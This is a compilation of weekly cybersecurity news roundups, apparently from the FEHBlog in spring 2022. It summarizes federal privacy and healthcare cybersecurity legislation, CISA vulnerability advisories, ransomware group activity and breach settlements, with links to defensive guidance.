From Capitol Hill, Cyberscoop reports

A sweeping federal privacy bill unveiled Friday [June 3] would give Americans unprecedented control over how companies collect and use their data. 

The discussion draft was released by Sen. Roger Wicker, R-Miss., and Reps. Cathy McMorris Rodgers, R-Wa., and Frank Pallone, D-Mass. It represents the results of months of intense negotiations and is a step toward federal privacy protections long-awaited by civil society groups.

The 64-page privacy framework introduces a range of changes designed to give consumers more control over their data. It would require covered companies to limit data collection, allow consumers to turn off targeted advertisements, grant broad protections for Americans against discriminatory uses of their data and rein in third-party data collection.

The bill also carves out special protections regarding biometric data, a growing source of concern for privacy and human rights activists. Under the legislation, companies can only collect and share biometric data under specific instances including responding to a warrant and affirmative consent.

The FEHBlog notes that the data security and protection of covered data section 208 is integrated with the corollary HIPAA and Gramm-Leach-Bliley rules.

From the law enforcement front

Cybersecurity tells us

The FBI managed to detect and mitigate an attack by Iranian state-sponsored hackers against Boston’s Children’s Hospital last summer, FBI Director Christopher Wray revealed on Wednesday.

“Quick actions by everyone involved, especially at the hospital, protected both the network and the sick kids that were dependent on it,” Wray said at the Boston Conference on Cyber Security. 

Wray called the incident one of the “most despicable cyberattacks” he’s seen, but he noted that the threat was hardly an isolated one. In 2021 the FBI saw ransomware attacks against 14 of the 16 services deemed critical infrastructure by the U.S. government, including hospitals. The FBI issued a warning last November that Iranian hackers were seeking data that could be used to hack U.S. companies.

The agency has been “laser-focused” on potential threats to critical infrastructure resulting from the United States’ support of Ukraine during an ongoing invasion of the nation by Russia. The United States has observed Russia “taking specific preparatory steps towards potential destructive attacks, both here and abroad,” Wray said. And the fallout of those attacks could get worse.

Nextgov informs us

Federal law enforcement agencies have seized several internet domain names in pursuit of an international investigation into websites that permit users to buy stolen personal data and information or hack other networks. 

Announced on Wednesday [June 1], the domain names OVH Booter, WeLeakInfo and IPStress.in have all been procured by the Federal Bureau of Investigation and Department of Justice with a seizure warrant issued by a U.S. District Court for the District of Columbia. 

“Today, the FBI and the department stopped two distressingly common threats: websites trafficking in stolen personal information and sites which attack and disrupt legitimate internet businesses,” said U.S. Attorney Matthew Graves. “Cybercrime often crosses national borders. Using strong working relationships with our international law enforcement partners, we will address crimes like these that threaten privacy, security and commerce around the globe.”

From the vulnerabilities front over the last week

• CISA has updated Cybersecurity Advisory AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control, originally released May 18, 2022. The advisory has been updated to include additional indicators of compromise and detection signatures, as well as tactics, techniques, and procedures reported by trusted third parties. CISA encourages organizations to review the latest update to AA22-138B and update impacted VMware products to the latest version or remove impacted versions from organizational networks. 

• Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability—CVE-2022-30190, known as “Follina”—affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild. CISA urges users and administrators to review Microsoft’s Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability and apply the necessary workaround.  Bleeping Computer offers more details on Follina, and Wired offers an update on this Follina warning.

• Atlassian has released new Confluence Server and Data Center versions to address remote code execution vulnerability CVE-2022-26134 affecting these products. An unauthenticated, remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability. CISA strongly urges organizations to review Confluence Security Advisory 2022-06-02 and upgrade Confluence Server and Confluence Data Center.

• The Healthcare Cybersecurity Coordination Center offered a webinar on the Return of Emotet and the Threat to the Health Sector. Emotet has been called the world’s most dangerous malware.

From the ransomware front over the last week

The Wall Street Journal reports, “Russia-linked ransomware groups are splitting into smaller cells or cycling through different types of malware in attempts to evade a growing array of U.S. sanctions and law-enforcement pressure, cybersecurity experts say.”

CISA issued an alert on the Karakurt Data Extortion Group. “Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.”

Here is a link to the latest Bleeping Computer’s Week in Ransomware.

From the cyber defense front

• Cyberscoop offers a video interview with Jim Richberg, Public Sector Field CISO and VP of Information Security at Fortinet concerning “important strategies to counter today’s heightened threat environment.”

• ZDNet identifies five simple errors that can make your “cloud” an attractive target for hackers.

• Security Week discusses four tactics to protect email systems.

• Health IT Security delves into the topic of HIPAA Physical Safeguards.

From Capitol Hill, Health IT Security reports

The US Senate Committee on Health, Education, Labor, and Pensions (HELP) held a full committee hearing on May 18 to discuss the need for an increased focus on education and healthcare cybersecurity.

“Attacks on healthcare are increasing in volume, variety, and impact—with consequences that now include the loss of life,” Joshua Corman, founder of I Am the Cavalry, said in his testimony.

“While directionally correct steps have been taken, we’re getting worse faster than we’re getting better. Bold actions and assistance will be required to change this trajectory, address these market failures, lack of incentives, and historical under-investments.”

Healthcare Dive adds

* Internal actors continue to pose a sticky cybersecurity problem for healthcare companies despite not causing a majority of data breaches, according to a new data breach report from Verizon.

* Employees were responsible for 39% of healthcare breaches last year. That’s compared to just 18% across all industries, Verizon found.

* The makeup of the insider breach has shifted from generally malicious misuse incidents to miscellaneous errors, with employees being more than 2.5 times more likely to make an error than purposefully misuse their access. Data misdelivery — like sending an email to the wrong person — along with device or document loss are the most common employee errors in healthcare, according to the report.

CISA offers its assistance:

Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States, Canada, New Zealand, the Netherlands,and the United Kingdom.

Download the PDF version of this report (pdf, 430kb).

Also from the vulnerability front, Cybersecurity Dive reports

Recurring critical vulnerabilities for VMware products this year indicate a worrying trend for customers that suggests the virtualization leader is taking a more reactive approach to security.

The company’s VMware Horizon product got hit hard by the Log4j vulnerability, and earlier this month VMware found itself entangled in an emergency directive from the Cybersecurity and Infrastructure Security Agency (CISA) that impacts up to 10 VMware products. 

It was the 10th emergency directive issued by CISA since the agency was founded in late 2018. 

Virtualization software is ubiquitous and managing the technology is further complicated by its many parts, ExtraHop CISO Jeff Costlow wrote in an email. Threat actors target vulnerabilities across these disaggregated systems before patches are released or deployed by impacted organizations.

VMware’s reputation in this regard has also taken a hit. 

Perhaps that’s what lead to this Wall Street Journal reports

Broadcom Inc. Chief Executive Hock Tan’s $61 billion deal to buy VMware Inc. marks the biggest bet yet that the boom in enterprise software demand will endure despite the economic tumult—and that bundling disparate offerings of low-profile products can yield outsize returns. 

Mr. Tan built Broadcom into a microchip powerhouse by acquiring makers of a host of unsexy-but-essential components, then cutting costs and leveraging the company’s growing pricing power. He is now banking that the same model will work in corporate software.

The deal to buy VMware, announced Thursday after The Wall Street Journal reported on details of the talks earlier in the week, would push Broadcom deeper into a software world populated by incumbents such as International Business Machines Corp. and Oracle Corp. as well as independent companies that specialize in niche applications. 

CISA added 20 known exploited vulnerabilities to its catalog this past week.

Bleeping Computer’s the Week in Ransomware was not published this week. Have a good Memorial Day Weekend.

From Capitol Hill, Nextgov informs us

Having cleared the Senate in January, the State and Local Government Cybersecurity Actpassed the House Tuesday and now awaits President Joe Biden’s signature.

The bill updates the House Homeland Security Act to direct the Department of Homeland Security to improve information sharing and coordination with state, local and tribal governments—all of which face growing risks of cyberattack. The legislation requires federal cybersecurity officials to share cybersecurity threat, vulnerability and breach data with states and localities, and provide some recovery resources when attacks occur.

From the vulnerabilities front —

Federal News Network reports

Agencies have until Monday [May 23] to mitigate vulnerabilities in five products from VMware that permit attackers to have deep access without the need to authenticate.

The Cybersecurity and Infrastructure Security Agency issued a new emergency directive today saying the vulnerabilities in VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager put federal networks and systems at immediate risk.

“These vulnerabilities pose an unacceptable risk to federal network security,” said CISA Director Jen Easterly in a release. “CISA has issued this Emergency Directive to ensure that federal civilian agencies take urgent action to protect their networks. We also strongly urge every organization — large and small — to follow the federal government’s lead and take similar steps to safeguard their networks.”

Here’s a link to the CISA website on this emergency directive.

CISA also released an analysis of Fiscal Year 2021 Risk and Vulnerability Assessments.

[This] analysis and infographic details the findings from the 112 Risk and Vulnerability Assessments (RVAs) conducted across multiple sectors in Fiscal Year 2021 (FY21). 

The analysis details a sample attack path comprising 11 successive tactics, or steps, a cyber threat actor could take to compromise an organization with weaknesses that are representative of those CISA observed in FY21 RVAs. The infographic highlights the three most successful techniques for each tactic that the RVAs documented. Both the analysis and the infographic map threat actor behavior to the MITRE ATT&CK® framework. 

CISA also added two known exploited vulnerabilities to its catalog last week.

From the ransomware front

Cybersecurity Dive reports

Most executives have and are willing to pay ransoms in the event of an attack, despite broad and consistent advice to the contrary. 

Nearly four in five organizations impacted by ransomware attacks have paid the ransom to regain access to corporate data, according to a survey conducted last month by Kaspersky.

The findings, while not surprising, highlight the extent to which a widely acknowledged best practice is rarely followed. Cybersecurity professionals, including Kaspersky, consistently advise businesses hit by ransomware to never pay the ransom.

Cyberscoop tells us

The federal government has made strides in deterring ransomware over the past year, but still has a number of milestones to reach, according to a new paper from the Institute for Security and Technology’s Ransomware Task Force. * * *

Of the 48 specific recommendations the Ransomware Task Force made in its initial report, 12 have seen tangible progress in the year since. Some initial steps have been taken on 29 recommendations, while seven recommendations have seen no action.

The United States has made the most progress in addressing the RTF’s recommendations for deterring ransomware, according to Friday’s update. In addition to the Department of Homeland Security launching a hiring “sprint” to combat cyber crime, the Justice Department last year created its own ransomware task force. And at the event Friday, Cybersecurity and Infrastructure Security Agency Director Jen Easterly said the DHS unit is creating another task force to collaborate with the FBI and other agencies that fight cybercrime.

The Healthcare Cybersecurity Coordination Center released a PowerPoint on major cyber organizations of the Russian Intelligence Services.

Bleeping Computer reports

The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more.

This news comes from Advanced Intel’s Yelisey Boguslavskiy, who tweeted [last Thursday] afternoon that the gang’s internal infrastructure was turned off. * * *

While it may seem strange for Conti to shut down in the middle of their information war with Costa Rica, Boguslavskiy tells us that Conti conducted this very public attack to create a facade of a live operation while the Conti members slowly migrated to other, smaller ransomware operations.

Of course, here is a link to the Bleeping Computer’s Week in Ransomware

From the cyber defenses front

The Wall Street Journal reports

The Justice Department on Thursday [May 19] urged prosecutors to narrow their enforcement of the nation’s main anti-hacking law in a bid to protect legitimate researchers who probe technology for security flaws.

The policy change is a victory for the many cyber professionals and academics who have criticized the Computer Fraud and Abuse Act for potentially criminalizing research that security experts see as key to protecting computer systems from cyberattacks.

Health Data Management discusses seven key steps for avoiding cyberattacks.

CISA offers an updated list of its “free” cybersecurity services, tools, and resources.

From our Nation’s Capital, Cybersecurity Dive reports

On the one-year anniversary of the Executive Order on Improving the Nation’s Cybersecurity, industry experts say the Biden administration has made significant inroads in raising software security standards, but additional work and financial support is necessary to achieve security end goals. 

The Office of Management and Budget’s (OMB) federal zero trust strategy enjoys almost unanimous support from federal cybersecurity decision makers, however two-thirds of federal cybersecurity decision makers said the three-year timeline was unrealistic, according to a study from MeriTalk, sponsored by AWS, CrowdStrike and Zscaler. Just 14% of those surveyed believe the program is properly funded.

Almost two-thirds of federal officials expect to achieve zero trust goals by the goal date of 2024, according to a separate study from General Dynamics Information Technology. However, many of those officials see significant challenges, including a lack of sufficient IT staff and the need to replace legacy infrastructure.

My, how time flies.

Cyberwire adds

A $63 million settlement has been reached in the class-action lawsuit filed over the 2015 data breach of the US Office of Personnel Management (OPM) that exposed the data of over 21 million current, former, and prospective federal employees and families members, the Epoch Times reports. The files were allegedly stolen by China-backed hackers, who exfiltrated highly sensitive information such as fingerprints and psychological and emotional health histories, and it is reported that the Chinese government has been using data from such breaches to build a database on American citizens for political and economic espionage. The agreement explains, “The settlement is the result of extensive negotiations and accounts for the unique aspects of this litigation, including the strict limitation on recovering from the Government and the causation problems that Defendants would have argued result from the hack’s attribution to a foreign state actor…That these data breaches were attributed to the Chinese government, apparently motivated by foreign policy considerations, would have compounded the risks associated with tracing plaintiffs’ harm to [OPM].” Under the settlement, which is still awaiting approval from a federal judge, OPM will pay $60 million and OPM contractor Peraton will pay $3 million into a fund for victims of the hack. 

The news strikes the FEHBlog as a good deal for the government.

From the ransomware front, Cyberscoop informs us

vosLocker, a prolific ransomware group that was the subject of a recent joint FBI and U.S. Treasury Department warning, claimed this week that it had hit a Dallas-based nonprofit Catholic health system with more than 600 facilities across four U.S. states, Mexico, Chile and Colombia.

The attack on CHRISTUS Health marks the second health care system AvosLocker targeted in the last two months. Michigan-based McKenzie Health System began notifying customers this week that patients’ personal data had been stolen from the company’s network in a “security incident” that “disrupted” some of its IT systems in March. The company did not identify the attacker, but AvosLocker posted purported McKenzie data to its dark web leak site April 6. * * *

Security Week adds

Over the past several months, Iran-linked cyberespionage group Charming Kitten has been engaging in financially-motivated activities, the Secureworks Counter Threat Unit (CTU) reports.

Also referred to as APT35, Magic Hound, NewsBeef, Newscaster, Phosphorus, and TA453, the advanced persistent threat (APT) actor is known for the targeting of activists, government organizations, journalists, and various other entities. * * *

The security researchers assess that, while the group has managed to compromise a large number of targets worldwide, “their ability to capitalize on that access for financial gain or intelligence collection appears limited.” However, the use of publicly available tools for ransomware operations shows that the group remains an ongoing threat, Secureworks concludes.

For more on Charming Kitten, check out this Cyberscoop article.

Here is a link to the Bleeping Computer’s Week in Ransomware column.

From the cyber vulnerabilities front, CISA added one new known vulnerability to its catalog.

From the cyber defenses front, here’s a link to a press release of note

The Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the United Kingdom’s National Cyber Security Centre (NCSC-UK), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) released an advisory today [May 11] with cybersecurity best practices for information and communications technology (ICT), focusing on enabling transparent discussions between managed service providers (MSPs) and their customers on securing sensitive data. CISA, NCSC-UK, ACSC, CCCS, NZ-NCSC, NSA, and FBI expect state-sponsored advanced persistent threat (APT) groups and other malicious cyber actors to increase their targeting of MSPs against both provider and customer networks. 

Security Week offers an expert view on seven steps to reduce risk to your critical infrastructure quickly.

From the ransomware front

The HHS Cybersecurity Program released a PowerPoint presentation on ransomware trends in the first quarter of this year.

Here’s a link to Bleeping Computers’ The Week in Ransomware.

Ransomware operations continue to evolve, with new groups appearing and others quietly shutting down their operations or rebranding as new groups. * * * [For example,] the notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.

Bleeping Computer adds

The US Department of State is offering up to $15 million for information that helps identify and locate leadership and co-conspirators of the infamous Conti ransomware gang.

Up to $10 million of this reward are offered for info on Conti leaders’ identity and location, and an additional $5 million for leading to the arrest and/or convictions of individuals who conspired or attempted to participate in Conti ransomware attacks.

From the vulnerabilities front

• CISA added “five new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.”

• The HHS Cybersecurity Program issued a bulletin on “April Vulnerabilities of Interest to the Health Sector”

• ZDNet informs us

The FBI has warned that business email compromise (BEC) fraud cost businesses around the world $43 billion in losses during the period between June 2016 and December 2021.  The FBI’s Internet Crime Center (IC3) logged a whopping 241,206 complaints in the four-and-a-half-year period, with losses totaling $43 billion, according to a new public service announcement. 

From the cyberdefenses front, CISA “is beginning a month-long mission to rock the message that multifactor authentication keeps you more secure! So, join us for MFA May!” Throughout the month of May:

Follow CISA on Twitter, Facebook, LinkedIn, and Instagram for rocking content all month on MFA.

Tell us on social media that your business or personal devices are now protected by MFA with the hashtag #EnableMFA!  We’ll do our best to Pour Some Sugar on your posts!

And since we all get by With A Little Help from Our Friends, challenge your friends, family, co-workers, and fellow rockers to #EnableMFA too.

For What it’s Worth, you can always learn more about multi-factor authentication at https://www.cisa.gov/mfa

The Wall Street Journal recently interviewed IBM’s CEO Arvind Krishna. The interview concludes as follows:

WSJ: What is the biggest challenge facing the CIO and enterprise technology going forward?

Mr. Krishna: Cybersecurity is the issue of the decade. I think that is the single biggest issue we all are going to face. You have to take an enterprise approach, layered defenses. You have got to encrypt your data. You have got to worry about access control. You have got to believe you will get broken into. You make sure that you can recover really quickly, especially when it comes to critical systems.

Well put

The Cybersecurity and Infrastucture Security Agency informs us

The Federal Bureau of Investigation (FBI) has released a Flash report detailing indicators of compromise (IOCs) associated with attacks involving BlackCat/ALPHV, a Ransomware-as-a-Service that has compromised at least 60 entities worldwide.

CISA encourages users and administrators to review the IOCs and technical details in FBI Flash CU-000167-MW and apply the recommended mitigations. 

Security Week and Bleeping Computer expand on this FBI alert for those interested.

CISA also added three known exploited vulnerabilities to its catalog.

In other vulnerability news, Cyberscoop tells us

More than 450 security researchers working through the Department of Homeland Security’s “Hack the DHS” bug bounty program identified more than 122 vulnerabilities, 27 of which were deemed critical, according to a DHS statement first obtained by CyberScoop.

The agency awarded $125,600 to participants in the program for finding and identifying the vulnerabilities, the agency said in the statement. The researchers, vetted by the agency before participating, were eligible to receive between $500 and $5,000 for verified vulnerabilities, depending on the severity. * * *

Friday’s results represent the first phase of the DHS bug bounty program. The second phase will consist of a live, in-person hacking event, while the third will identify lessons learned to inform future bug bounty programs.

Cybersecurity Dive reports

Amazon Web Services is scrambling to assist customers after security researchers at Palo Alto Networks found severe vulnerabilities in AWS hotpatches that were supposed to protect customers from the Log4Shell vulnerability. 

AWS released a software tool in mid-December designed to patch vulnerabilities found in the Log4j library, however security researchers at Palo Alto’s Unit 42 discovered code vulnerabilities that could let attackers break out of a container environment and gain escalated privileges. 

After working with Palo Alto researchers for months, Amazon released a new hotpatch earlier this week, Unit 42 said in research released Tuesday. Unit 42 researcher Yuval Avrahami is urging organizations to review their container environments and upgrade to the fixed version. A large number of users may have downloaded the original hotpatches. 

The HHS Health Sector Cybersecurity Coordination Center (HC3) released a comprehensive PowerPoint presentation about insider threats in healthcare.

From the ransomware front HC3 issued an an alert on Hive ransomware.

Hive is an exceptionally aggressive, financially-motivated ransomware group known to maintain sophisticated capabilities who have historically targeted healthcare organizations frequently. HC3 recommends the Healthcare and Public Health (HPH) Sector be aware of their operations and apply appropriate cybersecurity principles and practices found in this document in defending their infrastructure and data against compromise.

Beckers Health IT Issues explains

Here a four things to know about the cyber group, according to the warning: 

1. The group uses many common ransomware tactics, including the exploit of remote desktop protocol or VPN, and phishing attacks, in addition to more aggressive methods like directly calling the victims to apply pressure and negotiate ransom payments.

2. Other tactics deployed by the group include searching the victim’s systems that are tied to backups and either terminating or disrupting those connections, deleting shadow copies, backup files and even system snapshots.

3, Hive also conducts double extortion and supports this with their data leaks site, while operating as a ransomware-as-a-service model.

In total, Hive has claimed attacks on approximately 355 companies within 100 days of operations.

HHS is urging healthcare organizations to increase its preventive security measures, such as two-factor authentication, strong passwords, sufficient backups of the most critical data and continuous monitoring.

Speaking of passwords, Cybersecurity Dive discusses the efforts of the FIDO Alliance to gain industry acceptance of using smartphones as the IT authentication standard while the tech industry presses for new methods.

Cyberscoop reports

A joint federal advisory Wednesday says that foreign government-linked hackers are targeting specific industrial processes with tools meant to breach and disrupt them, with one cybersecurity firm noting that the prospective intruders demonstrate an unprecedented “breadth of knowledge” about industrial control systems.

The alert arrives one day after Ukrainian officials and a cyber firm discussed deflecting another ICS-targeting malware that attempted to shut down power in Ukraine. “ICS” is a term that encompasses a number of systems that are especially common in the energy and manufacturing sectors, including a variety known as supervisory control and data acquisition (SCADA).

Cybersecurity company Dragos, which aided in Wednesday’s alert, said it had named the advanced persistent threat (APT) group behind the tools Chernovite, and named the tools themselves Pipedream. Dragos said one potential use of the tools would be to disable an emergency shutdown system. Mandiant, which also aided in the alert, said the malware posed the greatest risk to Ukraine and other nations responding to the Russian invasion.

It’s helpful to know where the Russians are focusing their cyberattack. The latest Bleeping Computer’s Ransomware Week adds “The tables have turned with the NB65 hacking group modifying the leaked Conti ransomware to use in attacks on Russian entities.”

On the other hand, STAT News tells us,

Ransomware is no longer a threat reserved for only the largest health institutions. Small and rural providers are also getting hit with a wave of attacks, in some cases forcing them to resort to pen-and-paper record keeping to continue serving patients. “We were woefully unprepared,” said John Gaede, director of information services at Sky Lakes Medical Center in rural Oregon. The health system was hit with an attack in October 2020, just as it was responding to its first local surge of Covid cases, making a tough situation nearly impossible to manage.

Such attacks not only create logistical challenges, but also cut off access to electronic medical histories needed to safely care for patients. Read the full story from Marion Renault.

This past week, the Cybersecurity and Infrastructure Security Agency added nine new vulnerabilities to its catalog. CISA explains

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. 

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the specified criteria.

From the cybersecurity business front, Cybersecurity Dive informs us,

Kaseya, an IT security and remote monitoring firm, said Monday it will buy Datto for $6.2 billion cash. The deal comes about nine months after Kaseya was hit by a major ransomware and supply chain attack that targeted the company’s small- and medium-size customers. 

The price tag is being funded by an equity consortium, led by Insight Partners, along with significant participation from TPG and Temasek, as well as other firms, including Sixth Street. The agreement represents a 52% premium to Datto’s stock price of $23.37 as of March 16th.

Also on Monday, software investment firm Thoma Bravo announced it struck a $6.9 billion deal for identity management firm SailPoint Technologies Holdings and will take the firm private. SailPoint stockholders will receive $65.25 per share in cash, a 48% premium above the 90-day volume weighted average price. However, the deal has a special “go-shop” provision that allows the board to seek higher bids until May 16th.

From the cyberdefenses front —

• Federal News Network offers a transcript of an expert conversation about the Administration’s “signature cybersecurity initiative, namely to get every agency to move to zero trust systems architectures.”

• Cybersecurity Dive stresses the importance of any HIPAA-covered business going well beyond the minimum HIPAA privacy and security rule standards.

• Security Week reviews necessary cyberdefenses in the healthcare context.

• Another Security Week article recommends that the good guys think like hackers in order to improve their cyberdefenses.

The HHS Cybersecurity Program was a very active publisher last week. It issued

• On April 5, HC3 released a list of March vulnerabilities of interest to the healthcare sector;
• On April 6, HC3 issued a second ICS Medical Advisory – Philips Vue PACS;
• On April 7, HC3 provided a comprehensive slide deck about “Lapsus$, Okta and the Health Sector,” and
• On April 8, HC3 issued a sector alert titled “Phishing Campaigns Leveraging Legitimate Email Marketing Platforms.”

Meanwhile, the Cybersecurity and Infrastructure Security Agency released

• A one-pager on how to report cyber incidents to CISA. This document should help FEHB carriers when they need to report cyber incidents to OPM pursuant to the standard FEHB carrier contract;
• A “Secure Tomorrow Series Toolkit: Using Strategic Foresight to Prepare for the future.” CISA explains “The Secure Tomorrow Series is a unique platform that brings together SMEs, thought leaders, and others from academia, think tanks, the private sector, and National Labs to think proactively about future risks”, and
• A list of four known exploited vulnerabilities added to CISA’s vulnerabilities catalog.

CISA also announced that

April is Emergency Communications Month! Throughout the month, we’ll be recognizing the important work of both CISA and the emergency response community. The 911 operating system only begins to scratch the surface of emergency communications. This is a broad, complex, and strategically critical field that includes everything from radio communications systems, broadband and narrowband data systems, to alerts and warning systems, and so much more. It’s only because of this communications backbone that our emergency response community can be operational, collaborative, secure and resilient at the most critical moments.

From the cyberthreats front, ZDnet informs us

A hacking and cyber espionage operation is going after victims around the world in a widespread campaign designed to snoop on targets and steal information. 

Identified victims of the cyber attacks include organisations in government, law, religious groups, non-governmental organisations (NGOs), the pharmaceutical sector and telecommunications. Multiple countries have been targeted, including the U.S., Canada, Hong Kong, Japan Turkey, Israel, India, Montenegro, and Italy. 

Detailed by cybersecurity researchers at Symantec, the campaign is the work of a group they call Cicada – also known as APT10 – a state-sponsored offensive hacking group which western intelligence agencies have linked to Chinese Ministry of State Security. In some cases, the attackers spent as long as nine months inside the networks of victims.  

APT10 has been active for over a decade, with the earliest evidence of this latest campaign appearing in mid-2021. The most recent activity which has been detailed took place in February 2022 and researchers warn that the campaign could still be ongoing. * * *

Defending against a well-resourced nation-state backed hacking group isn’t easy, but there are steps which network defenders can take to help avoid becoming the victim of an attack. These include patching known vulnerabilities– such as those in Microsoft Exchange which Cicada appear to have exploited – and hardening credentials via the use of multi-factor authentication. 

Researchers also recommend the introduction of one-time credentials for administrative work to help prevent theft and misuse of admin logins and that cybersecurity teams should contiously monitor the network for potentially suspicious activity. 

The Wall Street Journal reports on how hackers target bridges between blockchains to engage in massive cryptoheists. A recent heist reaped $540 million in cryptocurrency for the hackers.

Hackers moved the funds by exploiting the Ronin Network, software that allows users of the online game “Axie Infinity” to transfer digital assets across different blockchains. Growing sums of money exchanged over such bridges has turned them into targets.

The FEHBlog understood that decentralized blockchains were hack proof, but apparently not.

From the cyberdefense front, Security Week offers a commentary on using a resilient zero trust policy.

The FEHBlog was delighted earlier this week to read this Department of Health and Human Services announcement requesting public comment to help HHS crafting a rule to implement the December 2021 HITECH Act amendmentl creating a limited safe harbor for HIPAA covered entities and business associates that use recognized security practices. HHS seeks public input on identifying these recognized security practices. The public comment deadline is June 6, 2022.

Individuals seeking more information about the RFI or how to provide written or electronic comments to OCR should visit the Federal Register to learn more: https://www.federalregister.gov/documents/2022/04/06/2022-07210/considerat

From Capitol Hill, Health IT Security reports

Senators Bill Cassidy (R-LA) and Jacky Rosen (D-NV) introduced the bipartisan Healthcare Cybersecurity Act (S. 3904), shortly after President Biden warned all critical infrastructure sectors to harden their cyber defenses to safeguard against potential Russian cyberattacks. * * *

The act aims to strengthen healthcare cybersecurity by partnering the Cybersecurity and Infrastructure Security Agency (CISA) with HHS. Specifically, the act would require CISA and HHS to enter into an agreement, as defined by CISA, that would improve cybersecurity in the healthcare and public health sector.

If passed, CISA will work with information sharing organizations and analysis centers to create resources specific to the healthcare sector and to promote threat sharing. The act also supports training efforts for private sector healthcare experts. CISA would be responsible for educating healthcare asset owners and operators on the cybersecurity risks within the sector and ways to manage those risks.

The act also mandated that CISA conduct a thorough study on the cybersecurity risks facing the healthcare sector. The study would explore strategies for securing medical devices and electronic health records, and how data breaches impact patient care.

The Senate Homeland Security and Governmental Affairs Committee held a business meeting on March 30, at which the Committee favorably reported an amended version of S. 3904 (Item 18). This action suggests that the bill has legislative legs. The FEHBlog will keep an eye on it.

Nextgov identifies six cybersecurity takeaways from the President’s proposed FY 2023 budget that was delivered to Capitol Hill last Monday.

In cybersecurity news, CISA announced yesterday

the start of National Supply Chain Integrity Month. CISA in partnership with the Office of the Director of National Intelligence (ODNI) and other government and industry partners is promoting a call to action for a unified effort by organizations across the country to strengthen information and communications technology (ICT) supply chain.

CISA’s themes for each week include:

Week 1: Power in Partnership – Fortify The Chain!

Week 2: No Shortages of Threats – Educate to Mitigate

Week 3: Question, Confirm, and Trust – Be Supplier Smart

Week 4: Plan for the Future – Anticipate Change

Resources include those developed by the ICT SCRM Task Force, a public-private partnership that embodies the Agency’s collective approach to enhancing supply chain resilience.

Check out our webpage weekly for resources, a social media toolkit, videos, and the latest news: CISA.gov/supply-chain-integrity-month. 

The HHS Cybersecurity Program informs us

The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy are aware of threat actors gaining access to a variety of internet-connected uninterruptible power supply (UPS) devices, often through unchanged default usernames and passwords. In recent years, UPS vendors have added an Internet of Things (IoT) capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance, and/or convenience.

CISA Insight – Mitigating Attacks Against Uninterruptible Power Supply Devices

Health IT Security reports

H-ISAC and Booz Allen Hamilton released a report and survey outlining the top cyber threats concerning healthcare executives in today’s sophisticated cyber threat landscape.

H-ISAC surveyed cybersecurity, IT, and non-IT executives and found no significant differences between the disciplines when the experts were asked to rank the top five greatest cybersecurity concerns facing their organizations in 2021 and 2022.

Ransomware deployment was the top-rated concern, followed by phishing and spear-phishing, third-party breaches, data breaches, and insider threats.

Medical Economics tells us, “The Confidentiality Coalition and the Workgroup for Electronic Data Interchange sent a letter to the Commerce and HHS Secretaries outlining their concerns with allowing unregulated third-party apps to get access to patient health information.”

From the ransomware front —

Cybersecurity Dive alerts us

The average ransomware payment to cybercriminals surged 78% last year to $541,010, fueled in part by the rapid spread of ransomware as a service (RaaS) business models that reduce barriers to entry for cyber extortionists, Palo Alto Networks said.

Ransomware attacks “show no signs of slowing down,” according to Ryan Olson, vice president of threat intelligence at Palo Alto Networks. “The long-term effects of these ransomware attacks can be devastating, going beyond the actual cost of the ransom to include a number of ancillary costs associated with downtime, remediation and disruptions to business,” the company said in a report.

Ransomware criminals last year targeted companies in the Americas in 60% of their attacks and demanded on average $2.2 million from their victims, a 144% increase compared with 2020, Palo Alto Networks said.

GCN reports

Ransomware encrypts faster than organizations can respond, making it unlikely that they can prevent a total loss of data from an attack, according to a new study.

The research by SURGe, Splunk’s new cybersecurity research arm, found that the median ransomware variant can encrypt 98,561 files totaling almost 54 gigabytes in 42 minutes and 52 seconds.

“Forty-three minutes is an extremely limited window of opportunity for mitigation, especially considering that the average time to detect compromise is three days, as the Mandiant M-Trends report found,” according to “An Empirically Comparative Analysis of Ransomware Binaries,” which Splunk published March 23.

As usual, here is a link to Bleeping Computer’s The Week in Ransomware.

From the cyberdefense front, CIS identifies best practices for regulatory compliance.

Speaking of regulatory compliance, HHS’s Office for Civil Rights announced four HIPAA Privacy Rule enforcement actions last week.